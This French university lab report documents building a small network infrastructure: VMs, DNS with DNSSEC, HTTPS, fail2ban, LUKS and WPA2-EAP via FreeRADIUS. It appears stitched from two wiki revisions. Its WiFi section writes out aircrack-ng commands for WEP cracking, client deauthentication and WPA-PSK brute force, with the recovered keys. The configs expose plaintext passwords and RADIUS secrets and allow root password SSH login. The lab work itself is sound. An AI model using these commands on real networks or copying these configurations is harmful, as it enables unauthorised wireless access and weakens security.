curl -6 https://msalhi.online -I
</syntaxhighlight>
<pre>
HTTP/1.1 200 OK
Date: Fri, 27 Feb 2026 11:04:38 GMT
Server: Apache/2.4.66 (Debian)
Strict-Transport-Security: max-age=63072000; includeSubDomains
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Last-Modified: Fri, 06 Feb 2026 20:23:53 GMT
ETag: "1515-64a2d916615c9"
Accept-Ranges: bytes
Content-Length: 5397
Vary: Accept-Encoding
Content-Type: text/html
</pre>

=== Sur Solstice (machine mandataire) ===
Test d’accès HTTPS via le proxy inverse (IPv4) :
<syntaxhighlight lang="bash">
curl -4 https://msalhi.online -I
</syntaxhighlight>
<pre>
HTTP/1.1 200 OK
Date: Fri, 27 Feb 2026 11:04:55 GMT
Server: Apache/2.4.66 (Debian)
Strict-Transport-Security: max-age=63072000; includeSubDomains
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Last-Modified: Fri, 06 Feb 2026 20:23:53 GMT
ETag: "1515-64a2d916615c9"
Accept-Ranges: bytes
Content-Length: 5397
Vary: Accept-Encoding
Content-Type: text/html
</pre>

Vérification des règles NAT :
<syntaxhighlight lang="bash">
iptables -t nat -L POSTROUTING -n -v
</syntaxhighlight>
<pre>
Chain POSTROUTING (policy ACCEPT 8219 packets, 528K bytes)
pkts bytes target prot opt in out source destination
18528 1577K MASQUERADE 0 -- * eth1 0.0.0.0/0 0.0.0.0/0
3254 225K MASQUERADE 0 -- * eth0 10.60.15.0/24 0.0.0.0/0
</pre>
La première règle assure la mascarade pour tout le trafic sortant sur l’interface publique (eth1). La seconde règle (source 10.60.15.0/24 sortant sur eth0) est résiduelle mais ne perturbe pas le fonctionnement.

== fail2ban ==

=== Sur Solstice ===
<syntaxhighlight lang="bash">
fail2ban-client status sshd
</syntaxhighlight>
<pre>
Status for the jail: sshd
|- Filter
| |- Currently failed: 0
| |- Total failed: 12792
| `- File list: /var/log/auth.log
`- Actions
|- Currently banned: 4
|- Total banned: 3114
`- Banned IP list: 134.199.155.127 162.243.33.174 152.42.166.201 206.189.90.119
</pre>

=== Sur Moon ===
<syntaxhighlight lang="bash">
fail2ban-client status sshd
</syntaxhighlight>
<pre>
Status for the jail: sshd
|- Filter
| |- Currently failed: 0
| |- Total failed: 1
| `- File list: /var/log/auth.log
`- Actions
|- Currently banned: 0
|- Total banned: 0
`- Banned IP list:
</pre>

== WPA2‑EAP – FreeRADIUS (sur Moon) ==
Statut du service :
<syntaxhighlight lang="bash">
systemctl status freeradius
</syntaxhighlight>
<pre>
● freeradius.service - FreeRADIUS multi-protocol policy server
Loaded: loaded (/lib/systemd/system/freeradius.service; enabled)
Active: active (running) since ...
</pre>

Test d’authentification local :
<syntaxhighlight lang="bash">
radtest msalhi WifiSecure2026! localhost 1812 testing123
</syntaxhighlight>
<pre>
Sent Access-Request Id 13 from 0.0.0.0:55851 to 127.0.0.1:1812 length 76
User-Name = "msalhi"
User-Password = "WifiSecure2026!"
NAS-IP-Address = 127.0.0.1
NAS-Port = 0
Message-Authenticator = 0x00
Cleartext-Password = "WifiSecure2026!"
Received Access-Accept Id 13 from 127.0.0.1:1812 to 127.0.0.1:55851 length 20
</pre>

Configuration du client RADIUS (point d’accès) extraite de <code>/etc/freeradius/3.0/clients.conf</code> :
<pre>
client vlan1_ap1 {
ipaddr = 172.27.0.4
secret = testing123
shortname = cisco-ap1-vlan1
nas_type = cisco
}
client vlan1_ap2 {
ipaddr = 172.27.0.3
secret = testing123
shortname = cisco-ap2-vlan1
nas_type = cisco
}
</pre>

== WPA2‑EAP – Point d’accès (wifi‑E304) ==
Connexion SSH (commande adaptée) :
<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.4
</syntaxhighlight>

Vérification du SSID et de son VLAN :
<pre>
wifi-E304#show dot11 ssid VM_SERVICES_15
SSID Name : VM_SERVICES_15
Status : Enabled
Broadcast SSID : Enabled
VLAN : 25
Authentication Methods : Open EAP, Network-EAP
WPA Key Management : WPA2
</pre>

Vérification des serveurs RADIUS configurés :
<pre>
wifi-E304#show running-config | include radius-server
radius-server host 192.168.20.2 auth-port 1812 acct-port 1813 key 7 044F0E151B284249584B56
...
</pre>

Statistiques RADIUS :
<pre>
wifi-E304#show aaa servers
RADIUS: id 7, priority 6, host 192.168.20.2, auth-port 1812, acct-port 1813
State: current UP, duration 794495s
Authen: request 2076, timeouts 1646
Transaction: success 430, failure 411
...
</pre>

Test d’authentification :
<pre>
wifi-E304#test aaa group radius_student25 msalhi WifiSecure2026! legacy
Attempting authentication test to server-group radius_student25 using radius
User was successfully authenticated.
</pre>

Clients associés :
<pre>
wifi-E304#show dot11 associations
802.11 Client Stations on Dot11Radio1:
SSID [VM_SERVICES_15] :
MAC Address IP address Device Name Parent State
a0b3.395a.dcc8 10.60.15.153 unknown - self EAP-Assoc
</pre>

État du VLAN 25 sur l’AP :
<pre>
wifi-E304#show vlan 25
Virtual LAN ID: 25 (IEEE 802.1Q Encapsulation)
vLAN Trunk Interfaces: Dot11Radio0.25, Dot11Radio1.25, GigabitEthernet0.25
</pre>

== WPA2‑EAP – Routeur central (C9200‑E304) ==
Connexion SSH (commande adaptée) :
<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.1
</syntaxhighlight>

Vérification du VLAN 25 :
<pre>
C9200-E304#show vlan brief | include 25
25 E15-MSalhi active
</pre>

Interface VLAN 25 :
<pre>
C9200-E304#show ip interface brief | include Vlan25
Vlan25 10.60.15.2 YES manual up up
C9200-E304#show ipv6 interface brief | include Vlan25
Vlan25 [up/up]
</pre>

VRRP pour VLAN 25 :
<pre>
C9200-E304#show vrrp brief | include 25
Vl25 25 IPv4 110 0 N Y MASTER 10.60.15.2(local) 10.60.15.1

C9200-E304#show vrrp Vlan25
Vlan25 - Group 25 - Address-Family IPv4
State is MASTER
Virtual IP address is 10.60.15.1
Priority is 110
Master Router is 10.60.15.2 (local)
</pre>

DHCP :
<pre>
C9200-E304#show ip dhcp pool
...
Pool PoolSalhi :
Utilization mark (high/low) : 100 / 0
Total addresses : 254
Leased addresses : 1
Excluded addresses : 150
Current index IP address range Leased/Excluded/Total
10.60.15.156 10.60.15.1 - 10.60.15.254 1 / 150 / 254

C9200-E304#show ip dhcp binding | include 10.60.15
10.60.15.153 ff39.5adc.c800.0100. Feb 27 2026 08:59 PM Automatic Active Vlan25
</pre>

Policy‑Based Routing (PBR) :
<pre>
C9200-E304#show route-map PBR_VLAN25
route-map PBR_VLAN25, permit, sequence 10
Match clauses:
ip address (access-lists): TRAFIC_VLAN25
Set clauses:
ip next-hop 193.48.57.167
Policy routing matches: 3128 packets, 1082288 bytes

C9200-E304#show ip access-lists TRAFIC_VLAN25
Extended IP access list TRAFIC_VLAN25
10 permit ip 10.60.15.0 0.0.0.255 any (3128 matches)

C9200-E304#show ip policy
Interface Route map
Vlan25 PBR_VLAN25
</pre>

Trunk vers le point d’accès :
<pre>
C9200-E304#show interfaces trunk
Port Mode Encapsulation Status Native vlan
Gi1/0/1 on 802.1q trunking 1

Port Vlans allowed and active in management domain
Gi1/0/1 1-2,11-12,15-16,19-20,23-25,28,530

C9200-E304#show interfaces GigabitEthernet1/0/1 switchport
Name: Gi1/0/1
Switchport: Enabled
Administrative Mode: trunk
Operational Mode: trunk
Trunking VLANs Enabled: ALL
</pre>

== Réseau basique et avancé ==

Routes sur E304 :
<pre>
C9200-E304#show ip route | include 10.60.15
C 10.60.15.0/24 is directly connected, Vlan25

C9200-E304#show ip route 0.0.0.0
Gateway of last resort is 193.48.57.162 to network 0.0.0.0
O*E2 0.0.0.0/0 [110/1] via 193.48.57.162, Vlan2
</pre>

Connectivité depuis Moon vers la passerelle VLAN 25 :
<syntaxhighlight lang="bash">
ping -c 3 10.60.15.1
</syntaxhighlight>
<pre>
PING 10.60.15.1 (10.60.15.1) 56(84) bytes of data.
64 bytes from 10.60.15.1: icmp_seq=1 ttl=253 time=1.35 ms
64 bytes from 10.60.15.1: icmp_seq=2 ttl=253 time=2.09 ms
64 bytes from 10.60.15.1: icmp_seq=3 ttl=253 time=1.17 ms

--- 10.60.15.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2003ms
rtt min/avg/max/mdev = 1.171/1.536/2.091/0.398 ms

----

= Conclusion =
L’infrastructure déployée répond à toutes les exigences du projet :
* Virtualisation Xen avec séparation des rôles (services / mandataire)
* Services sécurisés : SSH redirigé, DNS maître/esclave avec DNSSEC, HTTPS avec certificat Gandi, proxy inverse IPv4
* Filtrage des attaques par fail2ban
* Réseau redondant avec VRRP, DHCP, et Policy‑Based Routing
* WiFi sécurisé par WPA2‑EAP avec FreeRADIUS
* Tests d’intrusion concluants sur WEP et WPA2‑PSK
* Chiffrement de données avec LUKS

L’ensemble est fonctionnel et démontre une maîtrise des technologies mises en œuvre.

Atelier SysRes SE4 2025/2026 E15

2026-02-27T12:54:13Z

Msalhi : /* Effraction WiFi */

<div class="titlepage">

<div class="figure">

[[File:polytech_logo.png|image]]

</div>
'''Rapport de Projet SE4 IdO''' '''Année Universitaire 2025-2026'''

'''Étudiant: Mohamed SALHI''' '''Binôme: SE4.Solstice (mandataire) - SE4.Moon (services)'''

'''Domaine: <code>msalhi.online</code>'''
</div>
= Introduction =

Ce rapport documente la réalisation complète du projet de sécurité système et réseau dans le cadre du module SE4 IdO (Internet des Objets). L’objectif principal était de mettre en place une infrastructure réseau complète avec services virtualisés, en mettant l’accent sur la sécurité et la redondance.

L’architecture repose sur une approche '''dual-stack IPv4/IPv6''' avec :

* Une '''machine de services''' (SE4.Moon) hébergeant les services applicatifs
* Une '''machine mandataire''' (SE4.Solstice) gérant les accès IPv4 via NAT et proxy inverse
* Une infrastructure réseau redondante avec routeurs Cisco C9200
* Des services sécurisés (DNS avec DNSSEC, HTTPS avec certificats, SSH avec filtrage)


= Atelier système et réseau - Machines virtuelles =


== Création des machines virtuelles ==

Les machines virtuelles ont été créées sur l’hyperviseur Xen du Dom0 <code>capbreton.plil.info</code>.


=== Commandes de création ===

<syntaxhighlight lang="bash"># Création de la machine de services SE4.Moon
root@capbreton:~# xen-create-image --hostname=SE4.Moon --dhcp \
--bridge=pontKS --dir=/usr/local/xen --size=10GB \
--dist=daedalus --memory=2048M --force

# Création de la machine mandataire SE4.Solstice
root@capbreton:~# xen-create-image --hostname=SE4.Solstice --dhcp \
--bridge=pontKS --dir=/usr/local/xen --size=10GB \
--dist=daedalus --memory=2048M --force</syntaxhighlight>

=== Démarrage et connexion ===

<syntaxhighlight lang="bash"># Démarrage des VMs
xen create /etc/xen/SE4.Moon.cfg
xen create /etc/xen/SE4.Solstice.cfg

# Connexion aux consoles
xen console SE4.Moon
xen console SE4.Solstice

# Liste des VMs actives
root@capbreton:~# xen list
Name ID Mem VCPUs State Time(s)
SE4.Solstice 39 2048 1 -b---- 2560.1
SE4.Moon 119 2048 1 -b---- 452.3</syntaxhighlight>

== Configuration de la machine de services (SE4.Moon) ==


=== Montage des partitions LVM pour /var et /home ===

<syntaxhighlight lang="bash"># Création des fichiers de partition sur le Dom0
root@capbreton:/dev/virtual# lvcreate -L 10G -n SE4.Moon.var virtual
root@capbreton:/dev/virtual# lvcreate -L 10G -n SE4.Moon.home virtual

# Modification du fichier de configuration Xen
disk = [
'file:/usr/local/xen/domains/SE4.Moon/disk.img,xvda2,w',
'file:/usr/local/xen/domains/SE4.Moon/swap.img,xvda1,w',
'phy:/dev/virtual/SE4.Moon.home,xvdb,w',
'phy:/dev/virtual/SE4.Moon.var,xvdc,w',
]</syntaxhighlight>

=== Formatage et montage des partitions ===

<syntaxhighlight lang="bash"># Formatage des partitions
mkfs -t ext4 /dev/xvdb
mkfs -t ext4 /dev/xvdc

# Montage temporaire et copie des données
mount /dev/xvdc /mnt
mv /var/* /mnt/
umount /mnt

mount /dev/xvdb /mnt
mv /home/* /mnt/
umount /mnt

# Configuration du fstab
cat > /etc/fstab << EOF
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb /home ext4 defaults 0 2
/dev/xvdc /var ext4 defaults 0 2
EOF

# Application des modifications
mount -a</syntaxhighlight>

=== Configuration réseau ===

<syntaxhighlight lang="bash"># Fichier /etc/network/interfaces
auto lo
iface lo inet loopback

# Interface réseau privée (vers Solstice)
auto eth0
iface eth0 inet static
address 192.168.20.2/24
gateway 192.168.20.1

# Configuration IPv6 automatique
iface eth0 inet6 auto

# Vérification
root@Moon:~# ip a show eth0
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP
inet 192.168.20.2/24 brd 192.168.20.255 scope global eth0
inet6 2001:660:4401:60a0:216:3eff:fe6f:f547/64 scope global dynamic</syntaxhighlight>

=== Installation des paquets de base ===

<syntaxhighlight lang="bash">apt update && apt upgrade -y
apt install -y ssh apache2 bind9 bind9utils \
fail2ban openssl iptables-persistent \
net-tools curl wget vim</syntaxhighlight>

== Configuration de la machine mandataire (SE4.Solstice) ==


=== Configuration réseau ===

<syntaxhighlight lang="bash"># Fichier /etc/network/interfaces
auto lo
iface lo inet loopback

# Interface publique (réseau routé)
auto eth1
iface eth1 inet static
address 193.48.57.167/27
gateway 193.48.57.162 # Adresse VRRP virtuelle

iface eth1 inet6 auto

# Interface privée (vers Moon)
auto eth0
iface eth0 inet static
address 192.168.20.1/24

iface eth0 inet6 auto

# Vérification
root@Solstice:~# ip a show eth1
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP
inet 193.48.57.167/27 brd 193.48.57.191 scope global eth1
inet6 2001:660:4401:60a0:216:3eff:fe29:880f/64 scope global dynamic</syntaxhighlight>

=== Mise en place de la mascarade (NAT) ===

<syntaxhighlight lang="bash"># Activation du forwarding IP
echo "net.ipv4.ip_forward=1" >> /etc/sysctl.conf
sysctl -p

# Règles iptables pour la mascarade
iptables -t nat -A POSTROUTING -s 192.168.20.0/24 -o eth1 -j MASQUERADE
iptables -A FORWARD -i eth0 -o eth1 -j ACCEPT
iptables -A FORWARD -i eth1 -o eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT

# Sauvegarde pour persistance
iptables-save > /etc/iptables/rules.v4

# Ajout dans interfaces pour chargement au démarrage
post-up iptables-restore < /etc/iptables/rules.v4</syntaxhighlight>

= Services Internet =


== Serveur SSH ==


=== Configuration SSH sur Moon ===

<syntaxhighlight lang="bash"># Édition du fichier de configuration
vim /etc/ssh/sshd_config

# Modifications apportées :
PermitRootLogin yes
PasswordAuthentication yes
Port 22
# LogLevel VERBOSE

# Redémarrage du service
systemctl restart ssh
systemctl enable ssh</syntaxhighlight>

=== Redirection de ports pour l’accès IPv4 ===

<syntaxhighlight lang="bash"># Redirection du port 2201 vers Moon (SSH)
iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 2201 \
-j DNAT --to-destination 192.168.20.2:22

iptables -A FORWARD -p tcp -d 192.168.20.2 --dport 22 -j ACCEPT

# Sauvegarde
iptables-save > /etc/iptables/rules.v4

# Test de la redirection
ssh -p 2201 root@193.48.57.167 # Arrive sur Moon</syntaxhighlight>

== Serveur DNS ==


=== Configuration du serveur maître (Moon) ===

<syntaxhighlight lang="bash"># Fichier /etc/bind/named.conf.local
zone "msalhi.online" {
type master;
file "/etc/bind/zones/db.msalhi.online";
key-directory "/etc/bind/keys";
dnssec-policy "default";
inline-signing yes;
allow-transfer {
2001:660:4401:60a0:216:3eff:fe29:880f;
2001:660:4401:60a0:216:3eff:fe47:bbe7;
2001:660:4401:60a0:216:3eff:fed6:4bc3;
};
also-notify {
2001:660:4401:60a0:216:3eff:fe29:880f;
2001:660:4401:60a0:216:3eff:fed6:4bc3;
};
notify yes;
};

# Fichier de zone /etc/bind/zones/db.msalhi.online
$TTL 86400
@ IN SOA ns1.msalhi.online. admin.msalhi.online. (
2026020320 ; Serial INCRÉMENTÉ et corrigé
3600 ; Refresh
1800 ; Retry
604800 ; Expire
86400 ; Minimum TTL
)

; Serveurs de noms
@ IN NS ns1.msalhi.online.
@ IN NS ns1.merteuil.tech.

; Enregistrements
@ IN A 193.48.57.167
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe6f:f548
ns1 IN A 193.48.57.167
ns1 IN AAAA 2001:660:4401:60a0:216:3eff:fe6f:f548

www IN CNAME msalhi.online.

# Vérification
named-checkzone msalhi.online /etc/bind/zones/db.msalhi.online</syntaxhighlight>

=== Configuration du serveur secondaire (Solstice) ===

<syntaxhighlight lang="bash"># Fichier /etc/bind/named.conf.local
zone "msalhi.online" {
type master;
file "/etc/bind/zones/db.msalhi.online";
key-directory "/etc/bind/keys";
dnssec-policy "default";
inline-signing yes;
allow-transfer {
2001:660:4401:60a0:216:3eff:fe29:880f;
2001:660:4401:60a0:216:3eff:fe47:bbe7;
2001:660:4401:60a0:216:3eff:fed6:4bc3;
};
also-notify {
2001:660:4401:60a0:216:3eff:fe29:880f;
2001:660:4401:60a0:216:3eff:fed6:4bc3;
};
notify yes;
};

# Redémarrage et vérification
systemctl restart bind9
ls -la /var/lib/bind/db.msalhi.online</syntaxhighlight>

=== Configuration chez le registrar Gandi ===

{| class="wikitable"
|+ Configuration DNS chez Gandi
|-
! style="text-align: left;"| '''Type'''
! style="text-align: left;"| '''Valeur'''
! style="text-align: left;"| '''Description'''
|-
| style="text-align: left;"| Nameservers
| style="text-align: left;"| ns1.msalhi.online
| style="text-align: left;"| Serveur DNS primaire
|-
| style="text-align: left;"|
| style="text-align: left;"| ns1.merteuil.tech
| style="text-align: left;"| Serveur DNS secondaire
|-
| style="text-align: left;"| Glue Record 1
| style="text-align: left;"| ns1.msalhi.online
| style="text-align: left;"| IPv6: 2001:660:4401:60a0:216:3eff:fe47:bbe7
|-
| style="text-align: left;"| Glue Record 2
| style="text-align: left;"| ns2.msalhi.online
| style="text-align: left;"| IPv4: 193.48.57.167
|}


== Sécurisation de site Web par certificat ==


=== Génération du CSR et obtention du certificat ===

<syntaxhighlight lang="bash"># Génération de la clé privée
openssl genrsa -out /etc/ssl/private/myserver.key 2048

# Génération du CSR
openssl req -new -key /etc/ssl/private/myserver.key \
-out /etc/ssl/private/server.csr</syntaxhighlight>

=== Configuration Apache sur Moon (HTTPS direct IPv6) ===

<syntaxhighlight lang="bash"># Fichier /etc/apache2/sites-available/msalhi-ssl.conf
<VirtualHost *:80>
ServerName msalhi.online
ServerAlias www.msalhi.online
Redirect permanent / https://msalhi.online/
</VirtualHost>

<VirtualHost *:443>
ServerName msalhi.online
ServerAlias www.msalhi.online

DocumentRoot /var/www/html

SSLEngine on
SSLCertificateFile /etc/ssl/msalhi/msalhi.online.crt
SSLCertificateKeyFile /etc/ssl/msalhi/msalhi.online.key
SSLCertificateChainFile /etc/ssl/msalhi/GandiStandardSSLCA2.pem

Header always set Strict-Transport-Security "max-age=63072000; includeSubDomains"
Header always set X-Frame-Options DENY
Header always set X-Content-Type-Options nosniff

ErrorLog ${APACHE_LOG_DIR}/msalhi_ssl_error.log
CustomLog ${APACHE_LOG_DIR}/msalhi_ssl_access.log combined
</VirtualHost>

# Activation
a2enmod ssl
a2ensite msalhi-ssl.conf
systemctl restart apache2</syntaxhighlight>

=== Configuration du proxy inverse sur Solstice (HTTPS IPv4) ===

<syntaxhighlight lang="bash"># Fichier /etc/apache2/sites-available/msalhi-proxy.conf
<VirtualHost *:80>
ServerName msalhi.online
Redirect permanent / https://msalhi.online/
</VirtualHost>

<VirtualHost *:443>
ServerName msalhi.online

SSLEngine on
SSLCertificateFile /etc/ssl/msalhi/msalhi.online.crt
SSLCertificateKeyFile /etc/ssl/msalhi/msalhi.online.key
SSLCertificateChainFile /etc/ssl/msalhi/GandiStandardSSLCA2.pem

SSLProxyEngine on
ProxyPreserveHost On

# Utilisation de l'URL avec nom de domaine comme demandé
ProxyPass / https://msalhi.online/
ProxyPassReverse / https://msalhi.online/

SSLProxyVerify none
SSLProxyCheckPeerCN off

ErrorLog ${APACHE_LOG_DIR}/proxy_error.log
CustomLog ${APACHE_LOG_DIR}/proxy_access.log combined
</VirtualHost>

# Activation des modules
a2enmod proxy proxy_http ssl
a2ensite msalhi-proxy.conf
systemctl restart apache2</syntaxhighlight>

== Sécurisation de serveur DNS par DNSSEC ==


=== Configuration DNSSEC automatique ===

<syntaxhighlight lang="bash"># Création du répertoire pour les clés
mkdir -p /etc/bind/keys
chown bind:bind /etc/bind/keys

# Ajout dans named.conf.local
zone "msalhi.online" {
type master;
file "/etc/bind/zones/db.msalhi.online";
key-directory "/etc/bind/keys";
dnssec-policy "dnspol";
inline-signing yes;
};

# Politique DNSSEC dans named.conf.options
dnssec-policy "dnspol" {
keys {
ksk key-directory lifetime unlimited algorithm 13;
zsk key-directory lifetime unlimited algorithm 13;
};
nsec3param;
};

# Redémarrage et vérification
systemctl restart bind9
dig @localhost msalhi.online DNSKEY +dnssec</syntaxhighlight>

=== Résultat des clés DNSSEC générées ===

<pre>; Clés obtenues via : dig @localhost msalhi.online DNSKEY +dnssec

msalhi.online. 3600 IN DNSKEY 256 3 13 Mi9LJ2JnnUciYfGEXoDuZ0ElzOigo+Fjxhf2I1+zxZqcn7SN1FxxGfFJ v4xNsU/YTvGgzf7ZWgWa29b+OQOSug==
msalhi.online. 3600 IN DNSKEY 257 3 13 QrPmyYhhAVx1TGYLWRtAx/LbhQPy3yMd5/GoMH5SZ4aWD72QGVrfBOhh HW0/c1dYroeZ9riJTyQcO859svIWRw==
msalhi.online. 3600 IN DNSKEY 257 3 13 Z4LE6oWmFPOb+QzklArdW7HWkH6kVrjIgrKYrJBMW3n6sMwwEG1YruHe SvmXJ9GwuFxhqtRu130iPse3wrJqyQ==</pre>

=== Enregistrement de la KSK chez Gandi ===

{| class="wikitable"
|+ Configuration DNSSEC chez Gandi
|-
! style="text-align: left;"| '''Paramètre'''
! style="text-align: left;"| '''Valeur'''
|-
| style="text-align: left;"| Algorithm
| style="text-align: left;"| 13 (ECDSAP256SHA256)
|-
| style="text-align: left;"| Flags
| style="text-align: left;"| 257 (KSK)
|-
| style="text-align: left;"| Public Key
| style="text-align: left;"| QrPmyYhhAVx1TGYLWRtAx/LbhQPy3yMd5/GoMH5SZ4aWD72QGVrfBOhhHW0/c1dYroeZ9riJTyQcO859svIWRw==
|}

= Effraction WiFi =

== Cassage de clef WEP d’un point d’accès WiFi ==
Le réseau cible était <code>cracotte01</code> (BSSID <code>04:DA:D2:9C:50:50</code>, canal 4). La procédure a été réalisée depuis la machine <code>zabeth13</code> avec les outils <code>aircrack-ng</code>.

<ol>
<li>Passage de la carte en mode monitor :
<syntaxhighlight lang="bash">sudo airmon-ng start wlan0</syntaxhighlight>
</li>
<li>Capture ciblée :
<syntaxhighlight lang="bash">sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w capture_wep wlan0mon</syntaxhighlight>
</li>
<li>Authentification fake (association au point d’accès) :
<syntaxhighlight lang="bash">sudo aireplay-ng -1 6000 -o 1 -q 10 -e cracotte01 -a 04:DA:D2:9C:50:50 -h a0:b3:39:5a:dc:c8 wlan0mon</syntaxhighlight>
</li>
<li>Attaque ARP replay pour générer du trafic :
<syntaxhighlight lang="bash">sudo aireplay-ng -3 -b 04:DA:D2:9C:50:50 -h a0:b3:39:5a:dc:c8 wlan0mon</syntaxhighlight>
</li>
<li>Après accumulation d’environ 40 000 IVs, lancement de aircrack‑ng :
<syntaxhighlight lang="bash">sudo aircrack-ng capture_wep-01.cap</syntaxhighlight>
</li>
</ol>

La clé WEP a été trouvée en moins de 15 minutes : <code>FF:FF:FF:FF:FA:BC:02:CB:AE:EE:EE:EE:EE</code>.

== Cassage de mot de passe WPA‑PSK par force brute ==
Le réseau <code>kracotte01</code> (BSSID <code>44:AD:D9:5F:87:00</code>, canal 13) utilisait WPA2‑PSK.

<ol>
<li>Capture ciblée :
<syntaxhighlight lang="bash">sudo airodump-ng -c 13 --bssid 44:AD:D9:5F:87:00 -w wpa_capture wlan0mon</syntaxhighlight>
</li>
<li>Désauthentification d’un client (identifié <code>40:A5:EF:01:25:8B</code>) pour forcer un handshake :
<syntaxhighlight lang="bash">sudo aireplay-ng -0 10 -a 44:AD:D9:5F:87:00 -c 40:A5:EF:01:25:8B wlan0mon</syntaxhighlight>
</li>
<li>Après apparition du message '''“WPA handshake”''' dans <code>airodump‑ng</code>, lancement de l’attaque par dictionnaire (mots de passe à 8 chiffres) :
<syntaxhighlight lang="bash">crunch 8 8 0123456789 | sudo aircrack-ng -b 44:AD:D9:5F:87:00 -w - wpa_capture-06.cap</syntaxhighlight>
</li>
<li>Résultat : le mot de passe <code>66689666</code> a été découvert après environ 30 minutes.</li>
</ol>

Ces tests illustrent la vulnérabilité des protocoles WEP et des mots de passe courts face à des attaques par force brute.
[[Fichier:Wpa-wps.png|vignette]]
----

= Sécurisations =

== Chiffrement de données ==
Sur Moon, une partition supplémentaire (disque virtuel <code>xvdb</code>, correspondant au volume LVM <code>SE4.Moon.home</code>) a été chiffrée avec LUKS.

<syntaxhighlight lang="bash">
# Chiffrement de la partition
cryptsetup luksFormat /dev/xvdb

# Ouverture du conteneur
cryptsetup open /dev/xvdb home_crypt

# Création d’un système de fichiers
mkfs.ext4 /dev/mapper/home_crypt

# Montage manuel
mount /dev/mapper/home_crypt /mnt/secret
</syntaxhighlight>

Pour automatiser le montage au démarrage, on ajoute dans <code>/etc/crypttab</code> :
<pre>
home_crypt /dev/xvdb none luks
</pre>
et dans <code>/etc/fstab</code> :
<pre>
/dev/mapper/home_crypt /home ext4 defaults 0 2
</pre>

Le mot de passe doit être saisi manuellement à chaque démarrage, ce qui est acceptable pour un serveur de test.

== Filtrage des services – fail2ban ==
Pour protéger SSH et les requêtes DNS malveillantes, <code>fail2ban</code> a été installé sur Moon et Solstice.

Fichier <code>/etc/fail2ban/jail.local</code> :
<pre>
[DEFAULT]
bantime = 3600
findtime = 600
maxretry = 3

[sshd]
enabled = true
port = ssh
filter = sshd
logpath = /var/log/auth.log
maxretry = 3

[named-refused-tcp]
enabled = true
port = domain,953
protocol = tcp
filter = named-refused
logpath = /var/log/named/security.log
maxretry = 3
</pre>

Filtre <code>/etc/fail2ban/filter.d/named-refused.conf</code> :
<pre>
[Definition]
failregex = ^\S+ named\[\d+\]: client <HOST>#\S+ .* query .* denied
ignoreregex =
</pre>

Le service est démarré et activé :
<syntaxhighlight lang="bash">
systemctl enable fail2ban
systemctl restart fail2ban
</syntaxhighlight>

== Sécurisation WiFi par WPA2‑EAP ==

=== Serveur FreeRADIUS sur Moon ===
Installation :
<syntaxhighlight lang="bash">
apt install freeradius freeradius-utils -y
</syntaxhighlight>

Ajout du client (point d’accès) dans <code>/etc/freeradius/3.0/clients.conf</code> :
<pre>
client vlan1_ap1 {
ipaddr = 172.27.0.4 # VLAN 1 management
secret = testing123
shortname = cisco-ap1-vlan1
nas_type = cisco
}
client vlan1_ap2 {
ipaddr = 172.27.0.3 # VLAN 1 management
secret = testing123
shortname = cisco-ap2-vlan1
nas_type = cisco
}

</pre>

Création d’un utilisateur dans <code>/etc/freeradius/3.0/users</code> :
<pre>
"msalhi" Cleartext-Password := "WifiSecure2026!"

"etudiant1" Cleartext-Password := "Password123"

"prof" Cleartext-Password := "AdminSE4!"

</pre>

Configuration EAP pour PEAP‑MSCHAPv2 dans <code>/etc/freeradius/3.0/mods-enabled/eap</code> (type par défaut <code>peap</code>, tunnel intérieur <code>mschapv2</code>).
Un conflit de port (18120) a été résolu en commentant la section <code>listen</code> dans <code>/etc/freeradius/3.0/sites-enabled/inner-tunnel</code> (ou en mettant <code>port = 0</code>).

Test local :
<syntaxhighlight lang="bash">
radtest msalhi WifiSecure2026! localhost 0 testing123

Sent Access-Request Id 13 from 0.0.0.0:55851 to 127.0.0.1:1812 length 76
User-Name = "msalhi"
User-Password = "WifiSecure2026!"
NAS-IP-Address = 127.0.0.1
NAS-Port = 0
Message-Authenticator = 0x00
Cleartext-Password = "WifiSecure2026!"
Received Access-Accept Id 13 from 127.0.0.1:1812 to 127.0.0.1:55851 length 20
</syntaxhighlight>
→ réponse <code>Access-Accept</code> attendue.

=== Configuration du point d’accès WiFi ===
Sur le point d’accès (wifi‑E304), les lignes suivantes ont été ajoutées (en conservant les configurations des autres étudiants) :
<syntaxhighlight lang="cisco">
aaa group server radius radius_student25
server 192.168.20.2 auth-port 1812 acct-port 1813

aaa authentication login eap_student25 group radius_student25

dot11 ssid VM_SERVICES_15
vlan 25
authentication open eap eap_student25
authentication network-eap eap_student25
authentication key-management wpa version 2
mbssid guest-mode

interface Dot11Radio0
encryption vlan 25 mode ciphers aes-ccm
ssid VM_SERVICES_15

interface Dot11Radio0.25
encapsulation dot1Q 25
bridge-group 25

interface GigabitEthernet0.25
encapsulation dot1Q 25
bridge-group 25

radius-server host 192.168.20.2 auth-port 1812 acct-port 1813 key radius_secret_salhi_2026
</syntaxhighlight>

=== Configuration DHCP sur les routeurs ===
Sur '''E304''' (plage 100‑150) :
<syntaxhighlight lang="cisco">
ip dhcp excluded-address 10.60.15.1 10.60.15.99
ip dhcp excluded-address 10.60.15.151 10.60.15.254

ip dhcp pool SALHI_VLAN25
network 10.60.15.0 255.255.255.0
default-router 10.60.15.1
dns-server 192.168.20.2 8.8.8.8
domain-name msalhi.online
lease 0 12
</syntaxhighlight>

=== Policy‑Based Routing (PBR) ===
